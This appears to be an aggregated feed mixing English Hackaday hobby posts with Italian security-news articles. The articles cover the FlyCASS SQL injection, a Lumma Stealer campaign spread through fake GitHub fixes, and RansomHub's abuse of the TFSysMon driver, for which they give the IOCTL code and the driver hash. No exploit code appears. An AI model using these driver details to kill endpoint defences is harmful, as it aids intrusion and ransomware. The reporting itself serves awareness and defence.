The basic hull did okay at first, save for some stability problems. Amazingly, though, it was remarkably well sealed against water ingress. It then got a trolling motor, survived a capsizing, and eventually took to the open water with the aid of some additional floatation.

We’ve seen big Benchys before, and we’ve seen fully functional 3D-printed boats before, too. It was about time the two concepts met in reality. Video after the break.

youtube.com/embed/ilIubT7ands?…

hackaday.com/2024/09/02/big-be…

As the name of the channel implies, [BuyItFixIt] likes to pick up cheap gadgets that are listed as broken and try to repair them. It’s a pastime we imagine many Hackaday readers can appreciate, because even if you can’t get a particular device working, you’re sure to at least learn something useful along the way.

But after recently tackling a VTech video baby monitor from eBay, [BuyItFixIt] manages to do both. He starts by opening up the device and going through some general electronics troubleshooting steps. The basics are very much worth following along with if you’ve ever wondered how to approach a repair when you don’t know what the problem is. He checks voltages, makes sure various components are in spec, determines if the chips are talking to each other with the oscilloscope, and even pulls out the thermal camera to see if anything is heating up. But nothing seems out of the ordinary.
The scope uncovers some serial data.
While poking around with the oscilloscope, however, he did notice what looked like the output of a serial debug port. Sure enough, when connected to a USB serial adapter, the camera’s embedded Linux operating system started dumping status messages into the terminal. But before it got too far along in the boot process, it crashed with a file I/O error — which explains why the hardware all seemed to check out fine.

Now that [BuyItFixIt] knew it was a software issue, he started using the tools built into the camera’s bootloader to explore the contents of the device’s flash chip. He uncovered the usual embedded Linux directories, but when he peeked into one of the partitions labeled Vtech_data2, he got a bit of a shock: the device seemed to be holding dozens of videos. This is particularly surprising considering the camera is designed to stream video to the parent unit, and the fact that it could record video internally was never mentioned in the documentation.

While copying the chip’s contents over serial would have been possible, [BuyItFixIt] instead pulled it out and physically dumped the whole thing with a reader. With a bit of Linux-fu, he’s able to mount the chip dump and confirm that the videos in question are of the previous owner’s infant. Yikes. Of course, he promptly deleted the files once he realized what the camera had stored, but it makes us wonder how many cameras like these are holding private video files waiting for a bad actor to uncover them. This is an important reminder of the inherent dangers of tossing away “broken” smart devices.
Dozens of videos featuring the parent and child were still stored on the device.
As for the repair itself, [BuyItFixIt] reasoned that some file — maybe the database of videos — must have been corrupted on the chip, so he took the nuclear option and wiped it all out. He had to use the bootloader commands to recreate the partition table, but once that was done, the firmware seemed to understand that it had been returned to a factory state and was finally able to boot up normally. He’s documented the commands he used to get it back up and running in the hopes he can help out somebody else with a similarly ailing camera.

We can never get enough of this sort of firmware hacking, and the fact that this particular bout opened up with a great real-world example of hardware diagnosis makes it all the better. This is a long video, but one that’s well worth your time to check out. If you’d like to see more repairs from [BuyItFixIt], we’ve got you covered.

youtube.com/embed/eQ9uW95OJ3s?…

hackaday.com/2024/09/02/video-…

Il 25 agosto 2024, il fondatore di Telegram Pavel Durov è stato arrestato in Francia. Le autorità francesi sospettano che Telegram sia stato utilizzato per sostenere varie attività criminali come il traffico di droga, il terrorismo e la criminalità informatica. In particolare, le funzionalità del messenger come “Persone nelle vicinanze” hanno attirato l’attenzione delle forze dell’ordine.

La funzione Persone nelle vicinanze di Telegram consente agli utenti di trovare altre persone e gruppi locali nelle vicinanze utilizzando i dati di geolocalizzazione. Nel corso della sua esistenza, acquisì una reputazione controversa, poiché veniva spesso utilizzato dai criminali per perseguitare e rintracciare le persone.

Inoltre, è stato utilizzato attivamente in strumenti come CCTV (Close-Circuit Telegram Vision), sviluppato da Ivan Glinkin. Questo strumento permetteva di inserire le coordinate e ottenere un elenco di utenti in un raggio massimo di 500 metri, il che lo rendeva conveniente per l’uso per scopi criminali.

Gli utenti di Telegram hanno recentemente notato che la funzione Persone nelle vicinanze ha smesso di funzionare. Non è noto se ciò sia dovuto a un problema tecnico o a un’interruzione intenzionale. Vale anche la pena notare che il giorno prima la funzione di visualizzazione del contatore degli utenti attivi per i bot ha smesso di funzionare, il che potrebbe indicare possibili modifiche tecniche o aggiornamenti nel messenger.

Questi sviluppi avvengono in un contesto di crescente pressione su Telegram da parte delle autorità di regolamentazione europee, soprattutto dopo l’approvazione del Digital Services Act (DSA) nel 2023, che ha aumentato il controllo sulle piattaforme digitali e le ha obbligate ad adottare misure più attive per moderare i contenuti.

La disabilitazione della funzione Persone nelle vicinanze potrebbe essere dovuta sia a questa pressione che al recente abuso di questa funzione.

L'articolo La funzione “Persone Vicine” di Telegram è scomparsa in alcune regioni dopo l’arresto di Durov proviene da il blog della sicurezza informatica.

Magic Eye tubes were popular as tuning guides on old-school radio gear. However, the tubes, the 6U5 model in particular, have become rare and remarkably hard to come by of late. When the supply dried up, [Bjørner Sandom] decided to build a digital alternative instead.

The build relies on a small round IPS display, measuring an inch in diameter and with a resolution of 128×115 pixels. One can only presume it’s round but not perfectly so. It was then fitted with a 25mm glass lens in order to give it a richer, deeper look more akin to a real Magic Eye tube. In any case, a STM32F103CBT was selected to drive the display, with the 32-bit ARM processor running at a lovely 72 MHz for fast and smooth updates of the screen.

The screen, controller, and supporting circuitry are all built onto a pair of PCBs and installed in a 3D-printed housing that lives atop a tube base. The idea is that the build is a direct replacement for a real 6U5 tube. The STM32 controller receives the automatic gain control voltage from the radio set it’s installed in, and then drives the screen to behave as a real 6U5 tube would under those conditions.

By virtue of the smart design, smooth updates, and that nifty glass lens, the final product is quite a thing to behold. It really does look quite similar to the genuine article. If you’ve got a beloved old set with a beleagured magic eye, you might find this a project worth replicating. Video after the break.

youtube.com/embed/ghJo8rc5Zvc?…

youtube.com/embed/Q379PuWvB2U?…

hackaday.com/2024/09/02/a-digi…

Do you know Morse code already? Or are you maybe trying to learn so you can be an old school ham? Either way, you could have a lot of fun with [felix]’s great little entry into the 2024 Tiny Games Contest — Morse Quest.

This minimalist text-based adventure game is played entirely in Morse code. That is, the story line, all the clues, and the challenges along the way are presented by a blinking LED. In turn, commands like LOOK, TAKE, and INVENTORY are entered with the slim key on the lower right side. A wee potentiometer allows the player to adjust the blink rate of the LED, so it’s fun for all experience levels. Of course, one could always keep a Morse chart handy.

The brains of this operation is an Arduino Nano, and there’s really not much more to the BOM than that. It runs on a 9 V, so theoretically it could be taken anywhere you want to escape reality for a while. Be sure to check out the demo video after the break.

youtube.com/embed/rrmVYNtu1S4?…

hackaday.com/2024/09/02/2024-t…

Gli specialisti della sicurezza informatica hanno scoperto una vulnerabilità in uno dei principali sistemi di sicurezza del trasporto aereo, che consentiva alle persone non autorizzate di aggirare i controlli di sicurezza dell’aeroporto e ottenere l’accesso alle cabine degli aerei.

I ricercatori Ian Carroll e Sam Curry hanno scoperto una vulnerabilità in FlyCASS, un servizio web di terze parti che alcune compagnie aeree utilizzano per gestire il loro programma Known Crewmember (KCM) e Cockpit Access Security System (CASS). KCM è un progetto TSA che consente ai piloti e agli assistenti di volo di aggirare i controlli di sicurezza, mentre CASS consente ai piloti autorizzati di sedersi nelle cabine degli aerei durante il viaggio.

Il sistema KCM, gestito da ARINC (una filiale di Collins Aerospace), verifica le credenziali dei dipendenti delle compagnie aeree attraverso una piattaforma online dedicata. Per aggirare lo screening, è necessario seguire un processo di verifica, che include la scansione di un codice a barre KCM o l’inserimento di un numero identificativo del dipendente, quindi il controllo incrociato nel database della compagnia aerea.

I ricercatori hanno scoperto che il sistema di registrazione FlyCASS era suscettibile a un problema di SQL injection. Utilizzando questo bug, gli esperti sono riusciti ad accedere al sistema con diritti di amministratore per una determinata compagnia aerea (Air Transport International) e sono stati in grado di modificare i dati dei dipendenti. Così, durante i test, i ricercatori hanno aggiunto al sistema un dipendente fittizio con il nome e cognome “Test TestOnly”, e poi hanno dato a questo account l’accesso a KCM e CASS.

“Chiunque abbia una conoscenza di base delle SQL injection potrebbe andare su questo sito e aggiungere chiunque a KCM e CASS, il che gli ha permesso di aggirare i controlli di sicurezza e ottenere l’accesso alle cabine di pilotaggio degli aerei di linea commerciali”, afferma Carroll.

Rendendosi conto della gravità della situazione, i ricercatori hanno immediatamente segnalato la vulnerabilità alle autorità contattando il Dipartimento per la Sicurezza Nazionale degli Stati Uniti (DHS) il 23 aprile 2024.

Di conseguenza, il DHS ha riconosciuto la gravità della vulnerabilità e ha confermato che FlyCASS era stato disconnesso dal sistema KCM/CASS il 7 maggio 2024 come misura precauzionale. Poco dopo la vulnerabilità in FyCASS è stata risolta. Tuttavia,

Carroll sottolinea inoltre che la vulnerabilità potrebbe portare a violazioni della sicurezza su larga scala, come l’alterazione dei profili dei membri KCM esistenti per aggirare eventuali controlli richiesti per i nuovi membri.

L'articolo Una SQL Injection Espone le Cabine di Pilotaggio! I Ricercatori Scoprono una Minaccia nei Sistemi Aerei proviene da il blog della sicurezza informatica.

Gli hacker stanno abusando di GitHub per distribuire il malware Lumma Stealer, che ruba informazioni. Gli aggressori mascherano il malware sotto false correzioni, che pubblicano nei commenti ai progetti.

Questa campagna è stata scoperta per la prima volta da uno degli autori della libreria teloxide , che ha avvertito su Reddit di aver ricevuto cinque diversi commenti sui suoi problemi su GitHub. Erano tutti mascherati da correzioni, ma in realtà promuovevano malware.

Bleeping Computer riferisce di aver identificato migliaia di commenti simili su una varietà di progetti su GitHub che contenevano correzioni false. Pertanto, gli aggressori invitano le persone a scaricare un archivio protetto da password da mediafire.com o tramite un breve URL su bit.ly, per poi eseguire il file eseguibile in esso contenuto.

Facendo clic su questo collegamento si accede a una pagina di download per il file fix.zip, che contiene diverse DLL e un file eseguibile chiamato x86_64-w64-ranlib.exe. La password per prire l’archivio trovato in tutti i commenti era la stessa: “changeme“.

L’esecuzione del file eseguibile tramite Any.Run ha dimostrato che si tratta di un malware per rubare informazioni: Lumma Stealer.

Lo specialista in sicurezza informatica Nicholas Sherlock riferisce che in soli tre giorni, aggressori sconosciuti hanno pubblicato più di 29.000 commenti su GitHub che distribuisce Lumma.

Ricordiamo che sul sistema della vittima questo malware tenta di rubare cookie, credenziali, password, dati di carte bancarie e cronologia di navigazione da Google Chrome, Microsoft Edge, Mozilla Firefox e altri browser Chromium.

Lumma può anche rubare dati del portafoglio di criptovaluta, chiavi private e file di testo con i nomi seed.txt, pass.txt, ledger.txt, trezor.txt, metamask.txt, bitcoin.txt, parole, wallet.txt, *.txt e * .pdf perché probabilmente contengono chiavi private e password.

Sebbene lo staff di GitHub rimuova i commenti dannosi non appena vengono scoperti, molte persone hanno riferito di essere state colpite da questo attacco.

Si consiglia a chiunque abbia lanciato il malware di cambiare le password di tutti i propri account il prima possibile, impostando una password univoca per ogni sito e di trasferire la criptovaluta su un nuovo portafoglio.

L'articolo Lumma Stealer viene distribuito tramite 29.000 commenti su GitHub proviene da il blog della sicurezza informatica.

“Ogni mio nuovo lavoro rappresenta la summa e la sintesi di tutti quelli realizzati prima, evolvendone nuovamente il significato e la portata artistica. Credo che “Strategia Esoterica” abbia comunque una forza molto superiore perché frutto di una trasmutazione molto potente”- Deca @Musica Agorà

iyezine.com/deca-strategia-eso…

Deca - Strategia esoterica

Deca - Strategia esoterica - “Ogni mio nuovo lavoro rappresenta la summa e la sintesi di tutti quelli realizzati prima, evolvendone nuovamente il significato e la portata artistica.

^{Massimo Argo (In Your Eyes ezine)}

What happens when an unfortunate bug ends up in a spider’s web? It gets bitten and wrapped in silk, and becomes a meal. But if the web belongs to an orb-weaver and the bug is a male firefly, it seems the trapped firefly — once bitten — ends up imitating a female’s flash pattern and luring other males to their doom.

Fireflies communicate with flash patterns (something you can experiment with yourself using nothing more than a green LED) and males looking to mate will fly around flashing a multi-pulse pattern with their two light-emitting lanterns. Females will tend to remain in one place and flash single-pulse patterns on their one lantern.

When a male spots a female, they swoop in to mate. Spiders have somehow figured out a way to actively take advantage of this, not just inserting themselves into the process but actively and masterfully manipulating male fireflies, causing them to behave in a way they would normally never do. All with the purpose of subverting firefly behavior for their own benefit.

It all started with an observation that almost all fireflies in webs were male, and careful investigation revealed it’s not just some odd coincidence. When spiders are not present, the male fireflies don’t act any differently. When a spider is present and detects a male firefly, the spider wraps and bites the firefly differently than other insects. It’s unknown exactly what happens, but this somehow results in the male firefly imitating a female’s flash patterns. Males see this and swoop in to mate, but with a rather different outcome than expected.

The research paper contains added details but it’s clear that there is more going on in this process than meets the eye. Spiders are already fascinating creatures (we’ve seen an amazing eye-tracking experiment on jumping spiders) and it’s remarkable to see this sort of bio-hacking going on under our very noses.

hackaday.com/2024/09/02/spider…

Negli ultimi anni, la sicurezza informatica ha subito un’evoluzione rapida per contrastare le minacce sempre più sofisticate. Tuttavia, i cybercriminali continuano a trovare nuove modalità per aggirare le difese implementate dalle organizzazioni.

Un esempio recente è rappresentato dall’utilizzo di driver vulnerabili in attacchi mirati, una tecnica conosciuta come Bring Your Own Vulnerable Driver (BYOVD). In questo contesto, il gruppo di ransomware noto come RansomHub ha sfruttato un driver vulnerabile per disabilitare i sistemi di rilevamento e risposta degli endpoint (EDR) utilizzando uno strumento chiamato EDRKillShifter del quale avevamo parlato recentemente.

Descrizione del Driver Vulnerabile

Il driver utilizzato da RansomHub è TFSysMon (come riportato da Sophos), sviluppato da ThreatFire System Monitor, come dalle analisi svolte dal ricercatore di sicurezza Alex Necula di ACS Data System S.p.A che ha fornito a Red Hot Cyber una anteprima del suo rapporto di analisi.

Questo driver presenta una vulnerabilità critica dovuta alla mancanza di controlli di accesso adeguati in una chiamata IOCTL (0xB4A00404).

L’hash SHA256 del driver è 1c1a4ca2cbac9fe5954763a20aeb82da9b10d028824f42fff071503dcbe15856.

Il problema principale risiede in una subroutine chiamata dalla funzione IOCTL, che utilizza l’API ZwTerminateProcess senza verificare i permessi dell’utente che effettua la chiamata.

Funzionamento di EDRKillShifter

EDRKillShifter è lo strumento impiegato da RansomHub per sfruttare questa vulnerabilità. Esso sfrutta la mancanza di controllo nell’accesso alla funzione sub_1837C del driver, la quale accetta un argomento a1[3] senza verificare se chi invoca la funzione possieda i permessi necessari per terminare un processo. In altre parole, un attore malevolo può invocare il codice IOCTL per terminare in modo improprio un processo EDR, bypassando così le misure di sicurezza.

L’uso di EDRKillShifter da parte di RansomHub rappresenta una minaccia significativa per la sicurezza informatica. La capacità di disabilitare i sistemi EDR consente agli attaccanti di eludere la rilevazione e di eseguire le proprie operazioni malevole senza essere scoperti. In un attacco documentato, RansomHub ha sfruttato questa vulnerabilità per compromettere diversi sistemi, disabilitando con successo 5 su 7 software EDR testati.

POC (Proof of Concept)

In seguito alla scoperta della vulnerabilità nel driver TFSysMon, è stato sviluppato un Proof of Concept (POC) per dimostrare la fattibilità e l’impatto dell’exploit. Questo POC è stato realizzato per testare l’efficacia dell’attacco su diversi software EDR. Durante i test condotti nel mese di maggio, tre mesi prima che RansomHub iniziasse a utilizzare il driver vulnerabile, il POC ha dimostrato la capacità di terminare con successo cinque su sette software EDR testati.

Il POC sfrutta la chiamata IOCTL (0xB4A00404) che, come descritto, invoca la funzione sub_1837C senza eseguire controlli sui permessi. La mancanza di controllo di accesso permette al POC di terminare impropriamente i processi EDR, mostrando chiaramente come un attore malevolo potrebbe sfruttare questa vulnerabilità per disabilitare le difese di sicurezza di un sistema.

Per motivi di sicurezza, il codice del Proof of Concept non è stato pubblicato. Tuttavia, l’esperimento ha fornito prove concrete che questa vulnerabilità rappresenta una seria minaccia per i sistemi di sicurezza aziendali. L’esistenza di strumenti come EDRKillShifter, capaci di sfruttare tali debolezze, richiede che le organizzazioni adottino misure preventive efficaci, come l’aggiornamento regolare dei driver e la verifica della sicurezza delle proprie infrastrutture.

L’esperimento POC sottolinea inoltre l’importanza di una collaborazione continua tra ricercatori di sicurezza e fornitori di software, per identificare e correggere prontamente le vulnerabilità prima che possano essere sfruttate in attacchi reali.

Il POC sviluppato ha dimostrato non solo l’esistenza della vulnerabilità nel driver TFSysMon, ma anche la sua pericolosità se utilizzata da attori malevoli. Questo esperimento ha rafforzato l’importanza di adottare un approccio proattivo nella gestione delle vulnerabilità, includendo test regolari e aggiornamenti tempestivi. La condivisione delle scoperte tra la comunità della sicurezza è cruciale per prevenire attacchi futuri e proteggere le infrastrutture critiche da minacce sempre più sofisticate.

Conclusioni

Il caso di EDRKillShifter utilizzato da RansomHub è un promemoria inquietante della creatività e della persistenza dei cybercriminali. La mancanza di controlli di accesso nei driver al momento può avere conseguenze devastanti, permettendo agli attori malevoli di compromettere i sistemi di sicurezza più avanzati. È fondamentale che le organizzazioni mantengano un approccio proattivo alla sicurezza, includendo la valutazione continua delle vulnerabilità e la pronta applicazione di patch e aggiornamenti per mitigare tali rischi.

Un ringraziamento speciale va ad Alex Necula di ACS Data System S.p.A per aver condotto il Proof of Concept che ha permesso di evidenziare la vulnerabilità critica del driver TFSysMon. Il suo lavoro ha fornito un contributo fondamentale alla comprensione e alla mitigazione di questa minaccia. Senza la sua dedizione e competenza, sarebbe stato più difficile per la comunità della sicurezza riconoscere e affrontare efficacemente questo potenziale vettore d’attacco.

La sua collaborazione e il suo impegno per la sicurezza informatica sono altamente apprezzati e rappresentano un esempio di come il lavoro di un singolo ricercatore possa avere un impatto significativo sulla protezione collettiva contro le minacce informatiche.

L'articolo L’Arma Segreta di RansomHub per disabilitare gli EDR. Il PoC del BYOVD usato da EDRKillShifter proviene da il blog della sicurezza informatica.